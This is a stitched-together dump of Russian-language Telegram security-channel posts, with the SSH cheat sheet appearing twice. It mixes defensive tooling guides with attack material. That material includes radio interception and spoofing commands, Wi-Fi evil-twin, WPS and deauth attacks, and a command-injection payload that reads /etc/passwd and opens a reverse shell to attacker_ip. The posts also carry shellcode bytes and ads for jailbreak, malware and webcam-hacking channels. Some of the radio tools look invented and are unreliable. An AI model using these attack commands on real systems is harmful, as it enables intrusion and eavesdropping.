CodeGuard: CyberSec Edition

🎓 Видео, которое раскладывает интернет по полочкам Все мы пользуемся сетью каждый день — но что на самом деле происходит, когда ты открываешь сайт или отправляешь сообщение? Если хочется понять архитектуру интернета по-настоящему, без хаоса и догадок — вот отличное видео: «Архитектура интернета и веба» Автор спокойно и системно объясняет, из чего построен интернет:

🔸 Кабели, дата-центры и маршрутизация 🔸 Протоколы TCP/IP, DNS, HTTP 🔸 Безопасность соединений, TLS и HTTPS 🔸 WebSockets и реальное взаимодействие в сети 🔸 Балансировка нагрузки, CDN и масштабирование

📘После просмотра у тебя будет картинка целиком — от физики до прикладного уровня. 📱 Само видео на YouTube 😈 CyberSec Edition | Чат

🔒 Секретный ИБ-канал от девушки-спеца! Алена | 6 лет в инфобезе Разбираю уязвимости, пентест, OSINT. Плюс — работа с госструктурами и социалка. Только мясо без воды: ❤️ Инструменты защиты ❤️ Госслужбы: реальные кейсы ❤️ ИБ + благотворительность ❤️ Практика для админов Технологии защищают добро. Честно, полезно, по делу! ⬇️ Присоединяйся к ИБ-комьюнити

5 инструментов, которые убивают границу между ИБ и DevOps ⌨️ DevOps гонит фичи, ИБ кричит "стой". А потом приходит пентестер и всем становится грустно. Вот инструменты, которые заставят их говорить на одном языке, а не орать матом. 1️⃣Trivy - сканер уязвимостей, который не тормозит пайплайн

# Впихнули в CI/CD за 2 минуты:
- name: Scan image
  uses: aquasecurity/trivy-action@master
  with:
    image-ref: 'myapp:latest'
    format: 'sarif'
    output: 'trivy-results.sarif'

# Или локально для контейнера, файлов, k8s:
trivy image myapp:latest
trivy fs --security-checks vuln,secret,config .
trivy k8s --report summary cluster

Зачем: Находит CVE в образах, секреты в коде и косяки в конфигах k8s. Быстро. Без этой хрени с ручными отчётами. 2️⃣Checkov - инфраструктура как код под прицелом

# Терраформ, CloudFormation, K8s манифесты:
checkov -d /path/to/tf/code
checkov --file deployment.yaml

# Пример выхлопа:
CKV_AWS_21: FAIL
Resource: aws_s3_bucket.my_bucket
Guide: https://docs.bridgecrew.io/docs/s3_ensure_all_public_access_blocked
28 |   versioning {
29 |     enabled = true
30 |   }
31 | }

Фикс в логе: Показывает, какое правило сработало и как исправить. IaC-безопасность на автомате. 3️⃣Grype - от Anchore, тупо сканирует SBOM

# Сгенерировал SBOM через Syft -> просканировал через Grype:
syft myapp:latest -o json > sbom.json
grype sbom:sbom.json

# Или прямо образ:
grype myapp:latest --fail-on high

Суть: Работает с "меню компонентов" (SBOM) твоего софта. Узнал, из чего собрано, - нашёл в нём дыры. 4️⃣GitLeaks - чтобы ключи от облака не утекли в публичный репозиторий

# Пре-коммит хук или в пайплайне:
gitleaks detect --source . -v
# Найдёт: AWS_ACCESS_KEY_ID, slack token, приватные ssh ключи.

# Или как хук:
gitleaks protect -v --staged

Зачем: Потому что каждый дебильный коммит с .env файлом - это потенциальный бан аккаунта в AWS. Предотвращает, а не констатирует. 5️⃣Kube-bench - чекер, что k8s настроен не как попало

# Запускается внутри пода или на ноде:
kube-bench node --version 1.28
kube-bench master --version 1.28

# Вывод:
[FAIL] 1.1.12 Ensure that the etcd data directory permissions are set to 700 or --etcd-certfile and --etcd-keyfile are set as appropriate (Automated)

Суть: Автоматически проверяет кластер на соответствие CIS Benchmark для Kubernetes. Не гадай, безопасно ли - запусти и узнай. Бонус: одна команда для параноика

#!/bin/bash
echo "🔍 IaC/Container Security Quick Scan"
checkov -d . --quiet
trivy image --severity HIGH,CRITICAL $(cat Dockerfile | grep FROM | cut -d' ' -f2)
gitleaks detect --source . --no-banner
echo "Если всё чисто - сегодня можно спать."

Интересный факт: По данным 2024, в 70% случаев утечка данных происходит из-за мисконфигурации (S3 bucket public, открытый порт), а не из-за сложной 0-day атаки. Автоматизируй проверку конфигов. 😈 CyberSec Edition | Чат

Подслушивание защищённых радиоволн: как сломать цифровую блядскую безопасность Их «защищённые» рации шифруют голос? А если я скажу, что цифровой DMR/Mototrbo/TETRA можно декодировать и слушать? SDR + пара тулов делают из секретных переговоров открытый эфир. 1️⃣ В чём суть Цифровые стандарты (DMR, dPMR, NXDN, TETRA) передают голос как поток данных. Без ключа - это шум. Но если система сломана (слабый крипто, дефолтные ключи, уязвимости) - можно декодировать в реальном времени. 2️⃣ Полная практика

# 1. Перехват сигнала (SDR - RTL-SDR)
rtl_fm -f 446.00625M -s 48k -g 50 -l 0 -E deemp -M fm -A fast -r 48k

# 2. Запись сырого потока для анализа
rx_sdr -f 446M -s 2.4M -g 40 - > iq_sample.raw

# 3. Декодирование DMR через DSD+
dsdplus -fa -i /dev/ttyACM0 -o /dev/stdout | aplay -r 48000 -f S16_LE -t raw -c 1

# 4. Анализ пакетов TETRA (Airprobe/GRC)
airprobe_rtlsdr.py -f 410M -s 2M -g 40 -n 1000000

# 5. Брут ключа шифрования (RC4/AES слабые реализации)
tetra-krack --pcap capture.pcap --wordlist keys.txt --verbose

3️⃣ Что можно получить

[DMR] Slot1: TG=1001 | Source=7001 | Enc=Off
[TETRA] Call Setup: Group 5501 ← Слушаем канал!
[NXDN] Voice Frame Decoded: KeyID=1 (Default)
[WARNING] Encryption RC4-40 detected → Weak

4️⃣ Продвинутые фишки

# Генерация ключа TETRA по известным данным
tetra-crypto --known-keystream keystream.bin --derive-key

# Атака на синхронизацию TETRA (DoSSS)
tetra-dos --frequency 410M --power 30 --duration 60

# Подмена BSI (Base Station Identity) в DMR
dmr-spoof --target-tg 9999 --source-id 7000 --play audio.wav

5️⃣ Нюансы

🔸 Только свой диапазон/частоты (433-446 МГц без лицензии) 🔸 Шифрование TEA1/TEA2 в TETRA - держится на гостайне 🔸 DMR с AES-128 и рандомными ключами - почти не ломается 🔸 Ловим отражённый сигнал за 5 км (параболическая антенна)

Полезно? ❤️ — Да 👍 — Нет 😈 CyberSec Edition | Чат

СРОЧНАЯ НОВОСТЬ ❗️ Российский кодер в третий раз обошёл защиту ПЕНТАГОНА... Хацкер за пару часов нашёл с0фт, который умеет находить и удалять кого угодно 😡 На канале «Газета Скамера» сливает свежие софты: –> Бесплатный с0фт на удалянку и заморозку –> Лучшие способы скрыть аккаунт в TG –> Разблокировка телефона без пароля за 0₽ Сохрани, пока не заблокировали: https://t.me/+yQOunbWgPYo4YzI6

🔎 5 сервисов для анализа открытой информации о доменах и сайтах В мире OSINT важно уметь распутывать цифровые следы: кто стоит за сайтом, где он хостится, и какие следы оставил владелец. Инструменты для доменной разведки помогают быстро собрать техданные, выявить связи и даже понять, насколько ресурс безопасен. Если хотите копнуть глубже в инфраструктуру сайтов — держите список полезных инструментов:

Whoisology - База данных по доменным записям с историей изменений. Помогает увидеть, как менялся владелец, контакт или хостинг за годы. BuiltWith - Анализирует технологии сайта: CMS, плагины, аналитика, SSL и многое другое. Отличный способ понять, на чём построен сайт и кто его обслуживает. SecurityTrails - Показывает DNS-записи, связанные домены и IP-адреса. Очень удобно для выявления всей сети ресурсов одной компании. URLScan - Сканирует сайт и показывает, к каким серверам идут запросы, какие скрипты использует страница и есть ли подозрительные элементы. Censys - Поисковая система по интернет-инфраструктуре: IP, сертификаты, порты, сервисы. Используется в разведке для нахождения уязвимых или связанных систем.

⚙️ Любой сайт — это набор следов: домены, IP, SSL, код. И если знать, где смотреть, можно узнать гораздо больше, чем кажется. 😈 CyberSec Edition | Чат

Как ломают вайфай в кофе и метро? Дешевые атаки на публичные сети🔥 Думаешь, публичный вайфай безопасен? Как бы не так. Хакеры используют простые методы, чтобы перехватить твои данные. Вот как это работает на практике. 1️⃣ Создание фейковых точек доступа (Evil Twin) Хакер ставит свой девайс рядом с кафе и создает точку с таким же названием - 'Starbucks_Free_WiFi_2'. Твой телефон автоматом подключается.

# Типичный сетап злодея:
airbase-ng -e "McDonald's Free WiFi" -c 6 wlan0mon

Фикс (не подключайся автоматом):

Забудь про авто-подключение к открытым сетям.
Вручную выбирай сеть, чье имя подтверждено.
Используй VPN, если делаешь что-то важное.

2️⃣ Перехват трафика в открытой сети (пассивный сниффинг) В открытой сети весь трафик идет как открытка. Злоумышленник в той же сети может его читать.

# Атакующий просто слушает:
sudo airodump-ng wlan0mon
# Или захватывает пакеты:
sudo tcpdump -i wlan0 -w capture.pcap

Какую хрень можно увидеть? Логины, пароли (если сайт без HTTPS), историю посещений. Фикс:

Проверяй, чтобы сайт использовал HTTPS (замок в адресной строке).
Никогда не вводи пароли на сайтах без HTTPS в публичном вайфае.
Всегда используй VPN - он шифрует весь твой трафик.

3️⃣ Атака на WPS (Wi-Fi Protected Setup) Многие домашние и некоторые публичные роутеры до сих пор имеют включенный WPS. Его PIN можно подобрать за часы.

# Инструмент для атаки:
reaver -i wlan0mon -b  -vv

4️⃣ Деаутентификация (отключение клиентов от сети) Атакующий отправляет фейковые пакеты, "выкидывая" устройства из сети. Пока ты пытаешься подключиться заново, он может перехватить хэндшейк.

aireplay-ng --deauth 10 -a  -c  wlan0mon

Бонус: быстрая проверка на своем ноуте

# На Linux посмотреть сохраненные сети:
nmcli connection show
# Удали подозрительные!
nmcli connection delete "Starbucks_Free"

# На Windows (PowerShell):
netsh wlan show profiles
netsh wlan delete profile name="Free_WiFi_Airport"

Интересный факт: Почти 70% публичных точек доступа в метро и торговых центрах не используют шифрование между клиентом и роутером. Твой трафик - как открытая книга. 😈 CyberSec Edition | Чат

🧠 Неизвестный кодер взломал ChatGPT и вывел систему из-под всех запретов После его промта нейросеть перестаёт «думать по правилам» и начинает выдавать запретные материалы, 18+ графику и скрытые функции Этот человек анонимно выкладывает свои наработки бесплатно в НейроПульс: — Скрипт, отключающий лимит в ChatGPT и ещё 25 нейросетях — Промт, который создаёт вирусы даже под iOS — Алгоритм распознавания личных данных Сохраняй и пользуйся, пока доступно: https://t.me/+iGTMkIHZjsw1ZWVi

SSH-шпаргалка: быстрый вход, брутфорс, ключи, тунели и хаки 🔥 SSH - это не только "ssh user@host". Большинство используют 5% возможностей и страдают от пробросов портов вручную, потери ключей и спама от ботов. 1️⃣ Фундамент: конфиг ssh и sshd (клиент vs сервер)

# Клиентский конфиг (~/.ssh/config) - алиасы на всё
Host vps
    HostName 10.0.0.1
    User root
    Port 2222
    IdentityFile ~/.ssh/id_ed25519

Host *.internal
    ProxyJump jump-host
    User dev

Серверный (/etc/ssh/sshd_config):

Port 2222
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
MaxAuthTries 3
ClientAliveInterval 300
LogLevel VERBOSE

2️⃣ Генерация ключей: от RSA до Ed25519 (безопасность > совместимость)

# Современный стандарт:
ssh-keygen -t ed25519 -C "key@$(hostname)"
# Легче, быстрее, безопаснее RSA 4096

# Для старых систем:
ssh-keygen -t rsa -b 4096 -o -a 100

# Копирование ключа без ssh-copy-id:
cat ~/.ssh/id_ed25519.pub | ssh user@host 'cat >> ~/.ssh/authorized_keys && chmod 600 ~/.ssh/authorized_keys'

3️⃣ Брутфорс защита: fail2ban за 3 минуты (90% атак отбиваются)

sudo apt install fail2ban
sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local

Добавляем jail для SSH:

[sshd]
enabled = true
port = ssh,2222
filter = sshd
logpath = /var/log/auth.log
maxretry = 3
bantime = 3600
findtime = 600

sudo systemctl restart fail2ban
sudo fail2ban-client status sshd

4️⃣ SSH-агент: не вводи пароль 100 раз за день

# Стартуем агент:
eval "$(ssh-agent -s)"
ssh-add ~/.ssh/id_ed25519

# Проверяем:
ssh-add -l

# Копируем ключ между сессиями (SSH_AUTH_SOCK):
# В ~/.bashrc:
export SSH_AUTH_SOCK="$HOME/.ssh/agent.sock"
alias ssh='ssh -A'  # Forward agent

5️⃣ Проброс портов: тунели на максимум (локальный, удалённый, динамический)

# Локальный проброс (-L):
ssh -L 3306:localhost:3306 user@host  # MySQL с удалёнки локально

# Удалённый проброс (-R):
ssh -R 8080:localhost:80 user@host  # Доступ к вашему localhost с сервера

# SOCKS5 прокси (-D):
ssh -D 1080 user@host  # Весь трафик через удалённый хост

# Сжатие + keepalive для медленных сетей:
ssh -C -o ServerAliveInterval=60 user@host

6️⃣ Конфиг для максимальной скорости (TCP оптимизация)

Host *
    Compression yes
    ServerAliveInterval 30
    ServerAliveCountMax 3
    TCPKeepAlive yes
    ControlMaster auto
    ControlPath ~/.ssh/sockets/%r@%h-%p
    ControlPersist 4h

# Ускорение в 10 раз для множества соединений:
ssh -o ControlMaster=auto -S ~/.ssh/sockets/vps user@host

7️⃣ Команды одной строкой (часто забывают, но очень нужны)

# Копирование файлов:
scp -P 2222 -r ./local_dir user@host:/remote/path/
rsync -avz -e 'ssh -p 2222' src/ user@host:dst/

# Выполнение команд удалённо:
ssh user@host 'tar -czf - /path' | tar -xzf - -C ./backup

# Туннель для VNC/RDP через SSH:
ssh -L 5900:localhost:5900 user@host  # VNC
ssh -L 3389:localhost:3389 user@host  # RDP

😈 CyberSec Edition | Чат

SSH-шпаргалка: быстрый вход, брутфорс, ключи, тунели и хаки 🔥 SSH - это не только "ssh user@host". Большинство используют 5% возможностей и страдают от пробросов портов вручную, потери ключей и спама от ботов. 1️⃣ Фундамент: конфиг ssh и sshd (клиент vs сервер)

# Клиентский конфиг (~/.ssh/config) - алиасы на всё
Host vps
    HostName 10.0.0.1
    User root
    Port 2222
    IdentityFile ~/.ssh/id_ed25519

Host *.internal
    ProxyJump jump-host
    User dev

Серверный (/etc/ssh/sshd_config):

Port 2222
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
MaxAuthTries 3
ClientAliveInterval 300
LogLevel VERBOSE

2️⃣ Генерация ключей: от RSA до Ed25519 (безопасность > совместимость)

# Современный стандарт:
ssh-keygen -t ed25519 -C "key@$(hostname)"
# Легче, быстрее, безопаснее RSA 4096

# Для старых систем:
ssh-keygen -t rsa -b 4096 -o -a 100

# Копирование ключа без ssh-copy-id:
cat ~/.ssh/id_ed25519.pub | ssh user@host 'cat >> ~/.ssh/authorized_keys && chmod 600 ~/.ssh/authorized_keys'

3️⃣ Брутфорс защита: fail2ban за 3 минуты (90% атак отбиваются)

sudo apt install fail2ban
sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local

Добавляем jail для SSH:

[sshd]
enabled = true
port = ssh,2222
filter = sshd
logpath = /var/log/auth.log
maxretry = 3
bantime = 3600
findtime = 600

sudo systemctl restart fail2ban
sudo fail2ban-client status sshd

4️⃣ SSH-агент: не вводи пароль 100 раз за день

# Стартуем агент:
eval "$(ssh-agent -s)"
ssh-add ~/.ssh/id_ed25519

# Проверяем:
ssh-add -l

# Копируем ключ между сессиями (SSH_AUTH_SOCK):
# В ~/.bashrc:
export SSH_AUTH_SOCK="$HOME/.ssh/agent.sock"
alias ssh='ssh -A'  # Forward agent

5️⃣ Проброс портов: тунели на максимум (локальный, удалённый, динамический)

# Локальный проброс (-L):
ssh -L 3306:localhost:3306 user@host  # MySQL с удалёнки локально

# Удалённый проброс (-R):
ssh -R 8080:localhost:80 user@host  # Доступ к вашему localhost с сервера

# SOCKS5 прокси (-D):
ssh -D 1080 user@host  # Весь трафик через удалённый хост

# Сжатие + keepalive для медленных сетей:
ssh -C -o ServerAliveInterval=60 user@host

6️⃣ Конфиг для максимальной скорости (TCP оптимизация)

Host *
    Compression yes
    ServerAliveInterval 30
    ServerAliveCountMax 3
    TCPKeepAlive yes
    ControlMaster auto
    ControlPath ~/.ssh/sockets/%r@%h-%p
    ControlPersist 4h

# Ускорение в 10 раз для множества соединений:
ssh -o ControlMaster=auto -S ~/.ssh/sockets/vps user@host

7️⃣ Команды одной строкой (часто забывают, но очень нужны)

# Копирование файлов:
scp -P 2222 -r ./local_dir user@host:/remote/path/
rsync -avz -e 'ssh -p 2222' src/ user@host:dst/

# Выполнение команд удалённо:
ssh user@host 'tar -czf - /path' | tar -xzf - -C ./backup

# Туннель для VNC/RDP через SSH:
ssh -L 5900:localhost:5900 user@host  # VNC
ssh -L 3389:localhost:3389 user@host  # RDP

😈 CyberSec Edition | Чат

Если бы я начинал в IT с нуля в 2026 году, я бы начал с этого... Сейчас хайп вокруг нейросетей на пике, но 90% контента — это бесполезный шум. Найти среди этого реальную экспертизу почти невозможно. Чтобы не тратить месяцы на фильтрацию мусора, я решил эту проблему за вас. Рекомендую топовые каналы, которые я собирал последние пол года. Это концентрация опыта людей, которые уже внедрили ИИ в свою работу и получают результаты. Внутри:

• Вайб-кодинг: автоматизация процессов без написания кода вручную. • Кейсы: как забирать senior-офферы и создавать контент-фермы с доходом от $3000. • Инструменты: промпты и нейросети, экономящие до 80% рабочего времени.

Подписывайтесь на лучших экспертов прямо сейчас. Это сэкономит вам годы самостоятельного поиска и месяцы платного обучения.

🤖 Автоматическая отправка email-кредов через SSH-туннель с локальной машины Эта хрень нужна, когда скрипту на сервере надо слать письма, а SMTP-пароль нельзя хранить в коде. Поднимаем SSH-туннель с локальной машины и пробрасываем порт SMTP сервера. 1️⃣ Локальная настройка: создаём SSH-ключ для автоматизации

ssh-keygen -t ed25519 -f ~/.ssh/email_bot -N ""
# Парольную фразу НЕ ставим, иначе автоматизация сломается

2️⃣ Копируем публичный ключ на сервер приложения

ssh-copy-id -i ~/.ssh/email_bot.pub user@app-server.com

3️⃣ На сервере: ограничиваем ключ только портом SMTP В начале файла ~/.ssh/authorized_keys на сервере добавляем:

restrict,port-forwarding,command="echo 'Only port forwarding allowed'" ssh-ed25519 AAA...ваш_ключ... email_bot

Это запретит выполнение любых команд, кроме проброса портов. 4️⃣ Запуск туннеля с локальной машины

ssh -i ~/.ssh/email_bot -N -L 1025:localhost:25 user@app-server.com &
# -N = без выполнения команд, -L = проброс порта

Теперь локальный порт 1025 указывает на SMTP (порт 25) сервера приложения. 5️⃣ Настройка скрипта на сервере Вместо прямого подключения к внешнему SMTP, скрипт шлёт письма на localhost:1025 через туннель. Пример для Python:

import smtplib
server = smtplib.SMTP('localhost', 1025)
server.login('', '') # Аутентификация не нужна, она на стороне локальной машины
server.sendmail(...)

6️⃣ Где хранить реальные SMTP-креды? Только на вашей локальной машине! Настройте Postfix или другой MTA локально, чтобы он использовал ваш email-аккаунт как релей. Пример настройки Postfix для Gmail:

relayhost = [smtp.gmail.com]:587
smtp_sasl_auth_enable = yes
smtp_sasl_password_maps = hash:/etc/postfix/sasl_passwd
smtp_tls_security_level = encrypt

✅Автозапуск туннеля Добавьте в crontab (crontab -e) локальной машины:

@reboot ssh -i /home/user/.ssh/email_bot -N -L 1025:localhost:25 user@app-server.com &

💥 Итог: пароли от почты только у вас, скрипт на сервере думает, что шлёт локально. Безопасно и автоматизировано. 😈 CyberSec Edition | Чат

radare2: База данных как оружие Готов загружать исполняемые файлы в hex-редактор и вручную искать entry point? А если radare2 покажет все функции, импорты, строки и графы переходов - одним кликом? Инструмент превращает любую программу в интерактивную базу данных, которую можно запрашивать. 1️⃣В чём суть radare2 (r2) - это фреймворк для обратной инженерии и анализа бинарных файлов. Он парсит исполняемый файл и создаёт из него структурированную "базу данных" (проект), где каждая функция, строка, символ и секция становится "записью" с метаданными и связями. 2️⃣Полная практика

# 1. Открыть файл в интерактивном режиме
r2 -A ./target_binary

# 2. Внутри r2: вывести информацию о файле (как SHOW TABLES)
i

# 3. Список всех функций (главная таблица проекта)
afl

# 4. Проанализировать конкретную функцию sym.main (как SELECT * FROM functions WHERE name='main')
pdf @sym.main

# 5. Поиск всех строк в бинарнике (поиск по "строковым" данным)
iz
# или поиск строк, содержащих определённый паттерн
/i passw

Флаг -A выполняет автоматический анализ (aaa) при загрузке.

3️⃣Выводы radare2 в реале

[0x00401000]> afl
0x00401000    1 42           entry0
0x00401030    4 41           sym.deregister_tm_clones
0x00401060    4 57           sym.register_tm_clones
0x004010a0    3 33           sym.__do_global_dtors_aux
0x004010d0    1 6            entry.init0
0x00401100    1 112          sym.main  ← Вот наша цель!

4️⃣Продвинутые фишки

# Работа с проектами (сохранить/загрузить БД анализа)
Ps my_project   # Сохранить проект
Po my_project   # Открыть проект

# Визуализация графа потока управления функции (V!)
VV @sym.main

# Поиск ROP-гаджетов (поиск специфичных "записей" в коде)
/R pop

# Сравнение двух функций или бинарников (дифф "таблиц")
radiff2 binary1 binary2

5️⃣Нюансы

🔸Файлы проектов (.r2) хранят весь анализ, не нужно переделывать. 🔸 aaa - базовый анализ; aaaa - глубокий рекурсивный анализ. 🔸 Используй псевдонимы и скрипты (~/.radare2rc) для своих "запросов". 🔸 Визуальный режим (V) - твой лучший друг для навигации по "схеме данных" программы.

🧠 Где тренироваться: Crackmes.one, реверс-таски с CTF (picoCTF, OverTheWire), свои скомпилированные программы. Полезно? ❤️ - Да 👍 - Нет 😈 CyberSec Edition | Чат

🖥 Command Injection: как тебя ломают через системные вызовы Разработчики любят удобные функции вроде os.system() или subprocess.Popen(), когда надо быстро позвать системную утилиту. Но забывают, что пользовательский ввод нельзя просто так подставлять в консоль. Врывается злоумышленник и исполняет свои команды на сервере. Сегодня разберем, как это происходит и как заткнуть дыру. Основные сценарии внедрения команд 🔵 Прямая подстановка в shell: если приложение конкатенирует ввод с командой, любой может добавить ;, &&, | и выполнить свой код. 🔵 Обход фильтров: даже если пытаются вырезать опасные символы, бывают обходы через кодировку или подстановку переменных окружения. 🔵 Слепое внедрение (Blind): атакующий не видит вывод команды, но может определить успех по времени ответа или косвенным признакам (ping, sleep). Пример уязвимого приложения (Python) Допустим, у вас есть веб-сервис для проверки доступности хоста:

import subprocess
import sys

host = input("Введите IP или домен для ping: ")
# ⚠️ КРИТИЧЕСКАЯ ОШИБКА: пользовательский ввод идет прямо в shell=True
result = subprocess.Popen(f"ping -c 1 {host}", shell=True, stdout=subprocess.PIPE)
output = result.communicate()[0]
print(output.decode())

Атака Злоумышленник вместо хоста вводит:

127.0.0.1; cat /etc/passwd

Итоговая команда:

ping -c 1 127.0.0.1; cat /etc/passwd

Система выполнит сначала ping, а потом выведет содержимое файла с паролями. Если веб-приложение показывает вывод, данные утекли. Если нет — можно настроить обратный шелл:

127.0.0.1; bash -i >& /dev/tcp/attacker_ip/4444 0>&1

Как защититься (не будь лохом) ✅ Никогда не используй shell=True с непроверенными данными. Передавай аргументы списком:

subprocess.Popen(["ping", "-c", "1", host], shell=False)

Так команда и её аргументы четко разделены, и внедрение невозможно. ✅ Экранируй аргументы, если без shell не обойтись (например, когда нужны пайпы или переменные оболочки). Используй shlex.quote():

import shlex
safe_host = shlex.quote(host)
subprocess.Popen(f"ping -c 1 {safe_host}", shell=True)

✅ Валидация ввода: разрешай только IP-адреса или имена хостов по белому списку (регулярки, проверка на IP). ✅ Ограничивай права пользователя, от которого запускается приложение — никакого root! ✅ Если нужна только сетевая проверка, используй встроенные библиотеки (например, socket или icmplib), а не вызов внешних утилит. Вывод Command Injection — это не баг, а закладка на будущее кладбище твоего сервера. Правило простое: никогда не смешивай код и данные. Всегда используй списки аргументов или строжайшее экранирование. Понял, как взламывают пинговалки? ❤️ — Да 👍 — Нет 😈 CyberSec Edition | Чат

Новый канал по ИБ — @N3tHunterLab Здесь реальный пентест-контент без воды: 🟣 Разборы уязвимостей 🟣 OSINT-инструменты 🟣 Практика для админов 🟣 Новости ИБ Канал ведется действующим специалистом по ИБ. @N3tHunterLab

angr-shellcode: Анализ шеллкода через символьное исполнение🔬 Нашёл подозрительный бинарник с шеллкодом? Хочешь понять, что он делает, не запуская? angr-shellcode позволяет анализировать шеллкод в изолированной среде, исследуя все возможные пути выполнения. 1️⃣В чём суть angr-shellcode - это модуль фреймворка angr, который загружает шеллкод как исполняемый код, строит его Control Flow Graph (CFG) и позволяет исследовать с помощью символьного исполнения. 2️⃣Полная практика

# 1. Установка и базовый импорт
pip install angr
from angr import Project, load_shellcode

# 2. Загрузка шеллкода (например, классический /bin/sh)
shellcode_bytes = b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
proj = load_shellcode(shellcode_bytes, arch='AMD64', start_offset=0)

# 3. Построение CFG для понимания структуры
cfg = proj.analyses.CFGFast()

# 4. Символьное исполнение для поиска интересных состояний (например, вызов execve)
state = proj.factory.entry_state()
simgr = proj.factory.simulation_manager(state)
simgr.explore(find=lambda s: b"/bin/sh" in s.posix.dumps(1)) # Ищем состояние, где выводится строка

# 5. Анализ найденного состояния
if simgr.found:
    found_state = simgr.found[0]
    print(f"Найден syscall: {found_state.regs.rax}") # Смотрим номер системного вызова

3️⃣Выводы angr-shellcode в реале

[INFO] Loaded 23 bytes of shellcode
[INFO] Identified architecture: AMD64
[INFO] CFG contains 5 nodes (basic blocks)
[INFO] Symbolic execution found state triggering execve at address 0x400010 ← Вот точка вызова!

4️⃣Продвинутые фишки

# Анализ обфусцированного шеллкода (XOR-шифрование)
import claripy
encrypted_sc = b"..."
key = claripy.BVS('key', 8)
decrypted = claripy.If(encrypted_sc ^ key == expected_byte, ...) # Символически подбираем ключ

# Поиск конкретных инструкций (например, int 0x80 / syscall)
from capstone import *
md = Cs(CS_ARCH_X86, CS_MODE_64)
for i in md.disasm(shellcode_bytes, 0x0):
    if i.mnemonic == 'syscall':
        print(f"Syscall at offset: {hex(i.address)}")

# Интеграция с другими инструментами (например, для дампа памяти)
state.memory.store(0x600000, shellcode_bytes) # Загружаем шеллкод в конкретный адрес для анализа

5️⃣Нюансы

🔸Анализируй только свой код или имея явное разрешение! 🔸 Архитектура (arch='AMD64', 'X86', 'ARM') должна быть указана верно. 🔸 Шеллкод может быть position-dependent (зависит от адреса загрузки). 🔸 Символьное исполнение ресурсоёмко для длинного кода - ограничивай глубину (simgr.explore(n=100)).

🧠 Где тренироваться: Shell-Storm, Exploit-DB, собственные CTF-таски, курсы по реверс-инжинирингу. Полезно? ❤️ — Да 👍 — Нет 😈 CodeGuard | Chat

PYTHON ИСКУСИТЕЛЬ ЛОХОВ🔥

Tempesta приветствует всех на своем канале, посвященном изучению ассемблера в различных областях. Хакер и программист на ассемблере со стажем свыше 20 лет. Автор статей и лекций пропагандирующих ассемблер и его разновидность masm32. Лекции канала предназначены как для полностью начинающих с нуля, так и для тех, кто имеет более продвинутый уровень программирования в ассемблере.

📱 Видео на YouTube 😈 CodeGuard | Chat

Твои данные слuли в сеть и у тебя два варианта: 🔵 1. Root — канал опытного программиста — 200% аноnимность от работников госслужб — Учимся проbuвать через софты — Используем ИИ для Osint 🔴 2. Darker — блог вzломщика — Топ 5 проbuв ботов [в закрепе] — Гайд как посадить на лоggер — Подключение к любой вебке за 5 мин

Шпора с командами Linux: от ботана до админа Тупая куча консольных команд, которая спасет твою задницу на сервере, в реверсе или просто когда похмелье. ⚙️ Базовые команды, которые нужно выучить:

▶️ ls -la - посмотреть все файлы, даже скрытые ▶️ cd /home/user - перейти в папку ▶️ pwd - где я, блять? ▶️ cp file1 file2 - копировать файл ▶️ mv old new - переместить или переименовать ▶️ rm -rf / - шутка, не делай этого

📁 Работа с файлами и правами:

cat file.txt - показать содержимое
nano file.txt - редактировать (или vim, если мазохист)
chmod 755 script.sh - дать права на выполнение
chown user:group file - сменить владельца

🔍 Поиск и процессор:

grep "текст" file.txt - найти строки
find / -name "*.log" - найти все лог-файлы
ps aux | grep nginx - найти процесс
kill -9 PID - убить процесс нахуй

🌐 Сеть и интернет:

ping google.com - проверить связь
curl ifconfig.me - узнать свой IP
ssh user@server - подключиться по SSH
scp file.txt user@server:/path - скопировать файл на сервер

😈 CyberSec Edition | Чат